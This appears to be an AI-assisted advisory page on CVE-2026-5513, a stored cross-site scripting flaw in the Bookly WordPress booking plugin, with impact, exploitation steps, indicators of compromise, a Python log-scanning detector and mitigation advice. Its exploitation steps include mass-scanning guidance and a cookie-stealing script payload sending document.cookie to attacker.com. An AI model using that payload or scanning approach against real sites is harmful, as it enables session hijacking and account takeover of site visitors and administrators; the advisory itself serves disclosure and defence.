CVE-2026-5513
WordPress Vulnerability Analysis and Mitigation

Overview

CVE-2026-5513 is a Stored Cross-Site Scripting (XSS) vulnerability in the "Online Scheduling and Appointment Booking System – Bookly" plugin for WordPress, affecting versions up to and including 27.2. The flaw exists in the bookly-customer-full-name cookie due to insufficient input sanitization and output escaping, allowing unauthenticated attackers to inject arbitrary web scripts. Exploitation requires the "Remember personal information in cookies" setting to be enabled, which is disabled by default. It was published on June 13, 2026, with a CVSS v3.1 base score of 7.2 (High) (GitHub Advisory, Wordfence).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-site Scripting). When the "Remember personal information in cookies" feature is enabled, the Bookly plugin reads and renders the bookly-customer-full-name cookie value without adequate sanitization or output escaping, allowing attacker-controlled content to be stored and later reflected into page output. An unauthenticated attacker can craft a malicious cookie value containing JavaScript, which is then executed in the browsers of any user who visits an affected page. A public Python-based proof-of-concept exploit is available that automates detection and injection against vulnerable Bookly installations (GitHub Advisory, PoC Exploit).

Impact

Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the browsers of users visiting pages where the malicious cookie value has been rendered. This can lead to session cookie theft, credential harvesting, unauthorized actions performed on behalf of authenticated users (including administrators), and redirection to malicious sites. The scope is changed (S:C in CVSS), meaning the injected script can affect resources beyond the vulnerable component itself, such as the broader WordPress site and its users (GitHub Advisory, Wordfence).

Exploitation steps

  1. Reconnaissance: Use tools such as Shodan, Censys, or automated scanners to identify WordPress sites running the Bookly plugin (versions ≤ 27.2) with the "Remember personal information in cookies" setting enabled. The public PoC supports mass scanning from a target list with multi-threaded execution.
  2. Verify target configuration: Confirm that the vulnerable setting is active by interacting with the Bookly booking form and observing whether a bookly-customer-full-name cookie is set or accepted by the server.
  3. Craft malicious cookie: Construct an HTTP request that sets the bookly-customer-full-name cookie to a JavaScript payload, e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Inject payload: Submit the crafted cookie to the target site using the --inject flag of the PoC tool or via a manual HTTP request. The plugin stores or reflects the unsanitized cookie value into page output.
  5. Trigger execution: When any user (including administrators) visits an affected page that renders the injected cookie value, the malicious script executes in their browser, enabling session hijacking, credential theft, or further attacks (PoC Exploit, GitHub Advisory).

Indicators of compromise

  • Network: Unusual HTTP requests to Bookly booking pages containing bookly-customer-full-name cookie values with JavaScript tags or encoded script payloads (e.g., <script>, %3Cscript%3E, javascript:).
  • Network: Outbound connections from user browsers to unknown external domains shortly after visiting booking-related pages, potentially indicating cookie exfiltration.
  • Logs: Web server access logs showing requests with anomalous Cookie headers containing HTML/JavaScript content in the bookly-customer-full-name field.
  • Logs: WordPress or server logs showing repeated automated requests to booking pages from a single IP or range, consistent with mass scanning activity.
  • File System: Unexpected modifications to Bookly plugin files or WordPress theme files that could indicate follow-on compromise after session hijacking.
  • Process/Browser: Users reporting unexpected redirects or pop-ups when accessing booking or scheduling pages on the WordPress site (PoC Exploit, GitHub Advisory).
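The log-based indicator above can be checked mechanically. The script below is an added example, not code from the advisory or from the Bookly project: it parses constructed access-log lines whose Cookie header has been logged, extracts the bookly-customer-full-name value, undoes percent-encoding (including a second layer) and flags the script markers listed above. The log layout and the two event-handler markers beyond those named on the page are assumptions.

```python
import re
from urllib.parse import unquote

COOKIE_NAME = "bookly-customer-full-name"
# Script markers from the page's indicators, plus two common event-handler forms (assumed).
SCRIPT_MARKERS = ("<script", "javascript:", "onerror=", "onload=")
# Assumed log layout (not from the page): Apache combined format with the request's
# Cookie header appended in quotes through a "%{Cookie}i" LogFormat directive.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'\d+ \d+ "[^"]*" "[^"]*" "(?P<cookie>.*)"$')

def extract_cookie(header: str, name: str):
    """Return the value of cookie `name` from a Cookie header, or None if absent."""
    for part in header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return value
    return None

def normalise(value: str) -> str:
    """Undo up to two layers of percent-encoding and lowercase for matching."""
    for _ in range(2):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()

def is_suspicious(value: str) -> bool:
    """True if the cookie value carries any script-like marker."""
    normalised = normalise(value)
    return any(marker in normalised for marker in SCRIPT_MARKERS)

def scan_log(lines):
    """Return (client IP, timestamp, raw value) for each request whose name cookie looks injected."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # line lacks the expected Cookie field
        value = extract_cookie(match.group("cookie"), COOKIE_NAME)
        if value is not None and is_suspicious(value):
            hits.append((match.group("ip"), match.group("ts"), value))
    return hits

# Constructed sample log lines: one benign booking visitor, two injection attempts.
SAMPLE_LOG = [
    '203.0.113.10 - - [13/Jun/2026:10:00:01 +0000] "GET /book/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0" "bookly-customer-full-name=Jane%20Doe; wordpress_test_cookie=WP"',
    '198.51.100.7 - - [13/Jun/2026:10:02:15 +0000] "GET /book/ HTTP/1.1" 200 5123 "-" "python-requests/2.31" "bookly-customer-full-name=%3Cscript%3Ealert(1)%3C%2Fscript%3E"',
    '198.51.100.9 - - [13/Jun/2026:10:02:17 +0000] "GET /book/ HTTP/1.1" 200 5123 "-" "curl/8.0" "bookly-customer-full-name=javascript:alert(1)"',
]
```

Feed real log lines into `scan_log` to list the source addresses and timestamps of requests that set a script-like name cookie; the benign `Jane%20Doe` line is not reported.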

Mitigation and workarounds

Update the Bookly plugin to a version beyond 27.2, where the patch (changeset 3504922) addresses the insufficient sanitization and output escaping of the bookly-customer-full-name cookie (Wordfence, Plugin Changeset). As an immediate workaround, ensure the "Remember personal information in cookies" setting is disabled (it is off by default), which prevents the vulnerable code path from being triggered. Additionally, implementing a strict Content Security Policy (CSP) header can limit the impact of any XSS by restricting unauthorized script execution on the site.

Community reactions

The vulnerability was assigned and disclosed by Wordfence, which maintains a dedicated threat intelligence entry for it. Social media activity was observed on Mastodon (via RedPacketSecurity and VulDB accounts) and Bluesky shortly after disclosure, reflecting routine community tracking of new WordPress plugin CVEs. No major vendor statements or notable researcher commentary beyond the initial disclosure have been identified (Wordfence).

Additional resources


This report was generated with the help of AI.

Related WordPress vulnerabilities:

CVE ID           Severity  Score  Technologies  Component name                              CISA KEV exploit  Patched  Publication date
CVE-2026-5513    HIGH      7.2                  bookly-responsive-appointment-booking-tool  No                Yes      Jun 13, 2026
CVE-2026-9629    MEDIUM    6.4                  canvas                                      No                Yes      Jun 13, 2026
CVE-2026-3297    MEDIUM    6.4                  pagelayer                                   No                Yes      Jun 13, 2026
CVE-2026-1291    MEDIUM    4.3                  meow-gallery                                No                Yes      Jun 13, 2026
CVE-2025-15546   NONE      N/A                  wp-file-upload                              No                Yes      Jun 14, 2026
